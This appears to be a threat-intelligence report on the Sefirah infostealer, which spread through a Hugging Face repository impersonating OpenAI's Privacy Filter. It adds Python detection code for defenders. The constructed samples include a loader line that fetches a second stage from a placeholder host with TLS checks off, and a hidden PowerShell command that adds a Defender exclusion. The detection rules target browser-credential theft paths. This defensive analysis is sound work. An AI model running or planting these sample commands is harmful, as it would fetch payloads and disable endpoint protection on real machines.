Full Report
A malicious Hugging Face repository that reached the platform's trending list impersonated OpenAI's "Privacy Filter" project to deliver information-stealing malware to Windows users. [...]
Analysis Summary
# Tool/Technique: Sefirah Infostealer (via Hugging Face Typosquatting)
## Overview
This attack involves the distribution of a Rust-based information-stealing malware (identified as "Sefirah") through a malicious Hugging Face repository. The campaign utilized typosquatting by impersonating a legitimate OpenAI project ("Privacy Filter") to trick developers and AI researchers into downloading and executing malicious code.
## Technical Details
- **Type:** Malware (Infostealer) and Delivery Technique (Typosquatting/Supply Chain Attack)
- **Platform:** Windows
- **Capabilities:** Credential theft, data exfiltration, anti-analysis, privilege escalation.
- **First Seen:** May 7, 2026 (Reported)
## MITRE ATT&CK Mapping
- **TA0001 - Initial Access**
  - T1195.002 - Supply Chain Compromise: Compromise Software Supply Chain
- **TA0002 - Execution**
  - T1059.001 - Command and Scripting Interpreter: PowerShell
  - T1059.003 - Command and Scripting Interpreter: Windows Command Shell
  - T1204.002 - User Execution: Malicious File
- **TA0005 - Defense Evasion**
  - T1562.001 - Impair Defenses: Disable or Modify Tools (Microsoft Defender Exclusions)
  - T1497 - Virtualization/Sandbox Evasion
  - T1027 - Obfuscated Files or Information
- **TA0006 - Credential Access**
  - T1555 - Credentials from Password Stores
  - T1539 - Steal Web Session Cookie
- **TA0010 - Exfiltration**
  - T1041 - Exfiltration Over C2 Channel
## Functionality
### Core Capabilities
- **Browser Data Theft:** Targets Chromium and Gecko-based browsers to extract cookies, saved passwords, encryption keys, and session tokens.
- **Crypto-Asset Theft:** Scans for cryptocurrency wallet applications, browser extensions, and seed phrases/keys.
- **Communication Interception:** Steals Discord tokens, local databases, and master keys.
- **System Information Gathering:** Collects hardware details and captures multi-monitor screenshots.
- **Credential Harvesting:** Extracts SSH, FTP (FileZilla), and VPN configuration files.
### Advanced Features
- **Anti-Analysis:** Includes sophisticated checks to detect virtual machines (VMs), sandboxes, debuggers, and various malware analysis tools to prevent execution in lab environments.
- **Persistence & Evasion:** Automatically adds the payload to Microsoft Defender's exclusion list and executes PowerShell in invisible windows.
- **Reputation Manipulation:** The threat actors used auto-generated accounts to "star" or "like" the repository, artificially pushing it to the Hugging Face trending list to build false trust.
## Indicators of Compromise
- **File Names:**
  - `loader.py` (initial trigger)
  - `start.bat` (privilege escalation script)
  - `sefirah` (final Rust payload)
- **Network Indicators:**
  - hxxp[://]recargapopular[.]com (C2 exfiltration domain)
- **Behavioral Indicators:**
  - Python scripts disabling SSL verification.
  - Base64-encoded URLs within Python scripts.
  - Execution of PowerShell commands targeting Microsoft Defender exclusion lists.
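The two script-level indicators above (TLS verification disabled, base64-encoded URLs) can be checked statically before anything from a downloaded repository is executed. The following triage scanner is an added example, not code from the report or from any of the projects it names; the sample "loader" source it scans is constructed inline, and the pattern list and the `c2.example.invalid` placeholder URL are assumptions. It goes slightly beyond the page by also flagging the stdlib and urllib3 ways of disabling certificate checks, not only `verify=False`.

```python
"""Static triage of Python source for two behavioural indicators:
TLS certificate verification disabled and base64-encoded URL literals."""
import base64
import re
from typing import Dict, List

# Ways common Python HTTP stacks disable certificate verification (assumed list).
SSL_DISABLE_PATTERNS = [
    re.compile(r"verify\s*=\s*False"),               # requests / httpx
    re.compile(r"ssl\._create_unverified_context"),  # stdlib ssl
    re.compile(r"check_hostname\s*=\s*False"),
    re.compile(r"ssl\.CERT_NONE"),
    re.compile(r"urllib3\.disable_warnings"),        # usually paired with verify=False
]

# A quoted run of base64 alphabet long enough to hold a URL; decoded text is then
# checked for a URL scheme so ordinary identifiers do not produce noise.
B64_LITERAL = re.compile(r"['\"]([A-Za-z0-9+/]{16,}={0,2})['\"]")
URL_PREFIX = re.compile(r"^(https?://|ftp://)", re.IGNORECASE)


def decode_b64_urls(source: str) -> List[str]:
    """Return the decoded form of every base64 string literal that is a URL."""
    hits = []
    for m in B64_LITERAL.finditer(source):
        try:
            decoded = base64.b64decode(m.group(1), validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # not valid base64, or not text: ignore
        if URL_PREFIX.match(decoded):
            hits.append(decoded)
    return hits


def triage_python_source(source: str) -> Dict[str, List[str]]:
    """Scan one Python file; returns the matching lines and decoded URLs."""
    findings: Dict[str, List[str]] = {"ssl_verification_disabled": [], "base64_urls": []}
    for lineno, line in enumerate(source.splitlines(), 1):
        for pat in SSL_DISABLE_PATTERNS:
            if pat.search(line):
                findings["ssl_verification_disabled"].append(f"{lineno}: {line.strip()}")
                break  # one finding per line is enough
    findings["base64_urls"] = decode_b64_urls(source)
    return findings


# Constructed sample that mimics the shape of a first-stage loader (not the real file).
SAMPLE_LOADER = (
    "import base64, requests, ssl\n"
    f'ENC = "{base64.b64encode(b"https://c2.example.invalid/stage2").decode()}"\n'
    "ssl._create_default_https_context = ssl._create_unverified_context\n"
    "r = requests.get(base64.b64decode(ENC), verify=False)\n"
)

# Benign control: a normal download with certificate checks left on.
SAMPLE_BENIGN = "import requests\nr = requests.get('https://huggingface.co')\n"


if __name__ == "__main__":
    for name, src in (("sample_loader", SAMPLE_LOADER), ("benign", SAMPLE_BENIGN)):
        print(name, triage_python_source(src))
```

Run it over every `*.py` file in a freshly cloned repository before executing anything; a hit on either category is grounds to stop and read the file by hand, since legitimate model-card tooling has no reason to decode its download URL or disable certificate checks.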
## Associated Threat Actors
- **Unknown:** Attribution has not been established; however, researchers noted tactical overlaps (infrastructure and code) with an npm typosquatting campaign that previously distributed the **WinOS 4.0** implant.
## Detection Methods
- **Signature-based:** Monitoring for the specific "Sefirah" Rust binary and the `start.bat` logic that modifies Defender settings.
- **Behavioral detection:**
  - Identifying Python processes that spawn PowerShell with `Add-MpPreference -ExclusionPath` arguments.
  - Detection of unusual outbound traffic to `recargapopular[.]com`.
  - Monitoring for unauthorized access to browser profile folders (`AppData\Local\Google\Chrome\User Data`) by non-browser processes.
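The three behavioural rules above, expressed as detection logic and run over constructed process, file and DNS events in a Sysmon-like shape. This is an added example, not a detection the report or any vendor published; the event field names (`type`, `image`, `parent_image`, `command_line`, `process`, `path`, `host`) are assumptions about the log source. It generalises the first rule slightly: it also fires on `cmd.exe` as the parent (the report's `start.bat` stage) and on the other `Add-MpPreference` exclusion parameters.

```python
"""Behavioural detections for the Defender-exclusion, browser-profile and C2-domain
indicators, evaluated over constructed events."""
import re
from typing import Dict, List, Tuple

# C2 domain from the report, refanged for matching against DNS/network logs.
C2_DOMAINS = {"recargapopular.com"}
BROWSER_PROCESSES = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"}
SCRIPT_HOSTS = {"python.exe", "pythonw.exe", "cmd.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

DEFENDER_EXCLUSION = re.compile(
    r"Add-MpPreference\b.*-Exclusion(Path|Process|Extension)", re.IGNORECASE)
HIDDEN_WINDOW = re.compile(r"-(w|win|window|windowstyle)\s+hidden", re.IGNORECASE)
BROWSER_PROFILE_PATH = re.compile(
    r"\\AppData\\(Local|Roaming)\\(Google\\Chrome|Microsoft\\Edge|Mozilla\\Firefox)\\",
    re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.lower().rsplit("\\", 1)[-1]


def evaluate(event: Dict[str, str]) -> List[str]:
    """Return the names of every rule the event triggers."""
    alerts: List[str] = []
    kind = event.get("type")
    if kind == "process_create":
        image = basename(event.get("image", ""))
        parent = basename(event.get("parent_image", ""))
        cmd = event.get("command_line", "")
        if image in POWERSHELL and DEFENDER_EXCLUSION.search(cmd):
            alerts.append("defender_exclusion_added")
            if parent in SCRIPT_HOSTS:  # python/cmd -> powershell chain from the report
                alerts.append("script_spawned_defender_exclusion")
        if image in POWERSHELL and HIDDEN_WINDOW.search(cmd):
            alerts.append("hidden_powershell_window")
    elif kind == "file_access":
        proc = basename(event.get("process", ""))
        if BROWSER_PROFILE_PATH.search(event.get("path", "")) and proc not in BROWSER_PROCESSES:
            alerts.append("non_browser_profile_access")
    elif kind in ("dns_query", "network_connect"):
        host = event.get("host", "").lower().rstrip(".")
        if host in C2_DOMAINS or any(host.endswith("." + d) for d in C2_DOMAINS):
            alerts.append("known_c2_domain")
    return alerts


def scan(events: List[Dict[str, str]]) -> List[Tuple[str, str]]:
    """(event id, rule name) for every alert across a batch of events."""
    return [(e["id"], a) for e in events for a in evaluate(e)]


# Constructed events: two malicious-looking, then benign controls for each rule.
SAMPLE_EVENTS = [
    {"id": "e1", "type": "process_create", "parent_image": r"C:\Python311\python.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r'powershell -WindowStyle Hidden -Command Add-MpPreference -ExclusionPath "C:\Users\dev\AppData\Roaming\sefirah"'},
    {"id": "e2", "type": "process_create", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell -Command Get-Process"},
    {"id": "e3", "type": "file_access", "process": r"C:\Python311\python.exe",
     "path": r"C:\Users\dev\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"id": "e4", "type": "file_access", "process": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "path": r"C:\Users\dev\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"id": "e5", "type": "dns_query", "host": "recargapopular.com"},
    {"id": "e6", "type": "dns_query", "host": "huggingface.co"},
]


if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit)
```

The `script_spawned_defender_exclusion` rule is the high-confidence one: an interactive administrator adding an exclusion does so from a console or an admin shell, not from a Python interpreter that was started by a model-repository script. The `non_browser_profile_access` rule needs an allow-list for backup agents and password managers in a real deployment, which is why the process set is kept as an editable constant.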
## Mitigation Strategies
- **Prevention:** Verify the authenticity of Hugging Face repositories by checking the publisher's verified status and creation date.
- **Hardening:** Use Endpoint Detection and Response (EDR) tools to block unauthorized registry or policy changes to Windows Defender.
- **Security Policy:** Implement strict egress filtering to block communication with known malicious domains.
- **Response:** If compromised, users should reimage the host, rotate all stored credentials/SSH keys, and invalidate all active browser sessions.
## Related Tools/Techniques
- **WinOS 4.0:** An implant with overlapping infrastructure.
- **PyPI/npm Typosquatting:** Similar methodology used in other package manager ecosystems.
- **Model Card Impersonation:** A technique where malicious actors copy the documentation of legitimate AI projects to deceive users.